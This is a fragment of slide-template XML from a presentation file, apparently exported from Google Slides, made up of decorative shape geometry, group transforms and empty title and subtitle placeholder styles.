                    <a:cubicBezTo>
                      <a:pt x="3333" y="286"/>
                      <a:pt x="3283" y="110"/>
                      <a:pt x="3133" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3086" y="12"/>
                      <a:pt x="3035" y="1"/>
                      <a:pt x="29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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="370258" y="4858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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="88472" y="25155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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="376818" y="3564044"/>
                <a:ext cx="59004" cy="59022"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3259" h="3260" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="1629" y="627"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2180" y="627"/>
                      <a:pt x="2632" y="1079"/>
                      <a:pt x="2632" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2632" y="2181"/>
                      <a:pt x="2180" y="2632"/>
                      <a:pt x="1629" y="2632"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1078" y="2632"/>
                      <a:pt x="627" y="2181"/>
                      <a:pt x="627" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="627" y="1079"/>
                      <a:pt x="1078" y="627"/>
                      <a:pt x="1629" y="627"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1629" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="727" y="1"/>
                      <a:pt x="0" y="728"/>
                      <a:pt x="0" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2532"/>
                      <a:pt x="727" y="3259"/>
                      <a:pt x="1629" y="3259"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2531" y="3259"/>
                      <a:pt x="3258" y="2532"/>
                      <a:pt x="3258" y="1630"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3258" y="728"/>
                      <a:pt x="2531"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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="196921" y="2238919"/>
                <a:ext cx="22722" cy="22975"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1255" h="1269" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="625" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="461" y="0"/>
                      <a:pt x="295" y="72"/>
                      <a:pt x="176" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="216"/>
                      <a:pt x="126" y="241"/>
                      <a:pt x="101" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="317"/>
                      <a:pt x="51" y="342"/>
                      <a:pt x="51" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="417"/>
                      <a:pt x="26" y="467"/>
                      <a:pt x="1" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="542"/>
                      <a:pt x="1" y="592"/>
                      <a:pt x="1" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="793"/>
                      <a:pt x="51" y="943"/>
                      <a:pt x="176" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="1194"/>
                      <a:pt x="452" y="1269"/>
                      <a:pt x="627" y="1269"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="778" y="1269"/>
                      <a:pt x="953" y="1194"/>
                      <a:pt x="1054" y="1068"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="943"/>
                      <a:pt x="1254" y="793"/>
                      <a:pt x="1254" y="642"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1254" y="592"/>
                      <a:pt x="1254" y="542"/>
                      <a:pt x="1229" y="517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1229" y="467"/>
                      <a:pt x="1204" y="417"/>
                      <a:pt x="1204" y="392"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1179" y="342"/>
                      <a:pt x="1154" y="317"/>
                      <a:pt x="1154" y="291"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1129" y="241"/>
                      <a:pt x="1104" y="216"/>
                      <a:pt x="1054" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1028" y="166"/>
                      <a:pt x="1003" y="141"/>
                      <a:pt x="978" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="928" y="91"/>
                      <a:pt x="903" y="66"/>
                      <a:pt x="853" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="828" y="41"/>
                      <a:pt x="778" y="16"/>
                      <a:pt x="753" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="711" y="5"/>
                      <a:pt x="668" y="0"/>
                      <a:pt x="6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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="603052" y="0"/>
                <a:ext cx="22704" cy="22595"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1254" h="1248" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="614" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="451" y="0"/>
                      <a:pt x="288" y="57"/>
                      <a:pt x="176" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="194"/>
                      <a:pt x="125" y="219"/>
                      <a:pt x="100" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="295"/>
                      <a:pt x="50" y="320"/>
                      <a:pt x="50" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="395"/>
                      <a:pt x="0" y="445"/>
                      <a:pt x="0" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="520"/>
                      <a:pt x="0" y="570"/>
                      <a:pt x="0" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="771"/>
                      <a:pt x="50" y="946"/>
                      <a:pt x="176" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="301" y="1172"/>
                      <a:pt x="451" y="1247"/>
                      <a:pt x="627" y="1247"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="777" y="1247"/>
                      <a:pt x="952" y="1172"/>
                      <a:pt x="1053" y="1047"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="946"/>
                      <a:pt x="1253" y="771"/>
                      <a:pt x="1253" y="620"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1253" y="570"/>
                      <a:pt x="1228" y="520"/>
                      <a:pt x="1228" y="495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1228" y="445"/>
                      <a:pt x="1203" y="395"/>
                      <a:pt x="1203" y="370"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1178" y="320"/>
                      <a:pt x="1153" y="295"/>
                      <a:pt x="1128" y="270"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1103" y="219"/>
                      <a:pt x="1078" y="194"/>
                      <a:pt x="1053" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="940" y="57"/>
                      <a:pt x="777"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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-7" y="1029179"/>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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="341846" y="9701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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="584884" y="20180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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="507951" y="28901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 name="Google Shape;564;p20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="853926" y="2268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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1272693" y="165079"/>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566;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="294125" y="4807625"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="567" name="Google Shape;567;p20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3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8">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 647"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4908925" y="1498800"/>
            <a:ext cx="3515100" cy="841800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="5000"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4500"/>
              <a:buNone/>
              <a:defRPr sz="4500"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="649" name="Google Shape;649;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4908925" y="2340600"/>
            <a:ext cx="3515100" cy="1456500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="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p:cSld name="CUSTOM_4">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 852"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853" name="Google Shape;853;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543575" y="4771600"/>
            <a:ext cx="834900" cy="9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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543575" y="4945107"/>
            <a:ext cx="1199100" cy="9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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8530275" y="4771600"/>
            <a:ext cx="212400" cy="9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 name="Google Shape;856;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="1128258"/>
            <a:ext cx="584466" cy="3281784"/>
            <a:chOff x="8559523" y="1128258"/>
            <a:chExt cx="584466" cy="3281784"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="857" name="Google Shape;857;p33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016004" y="2994926"/>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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736973" y="19643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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9121267" y="3702904"/>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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8578586" y="13822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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8996935" y="112825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 name="Google Shape;866;p33"/>
          <p:cNvGrpSpPr/>
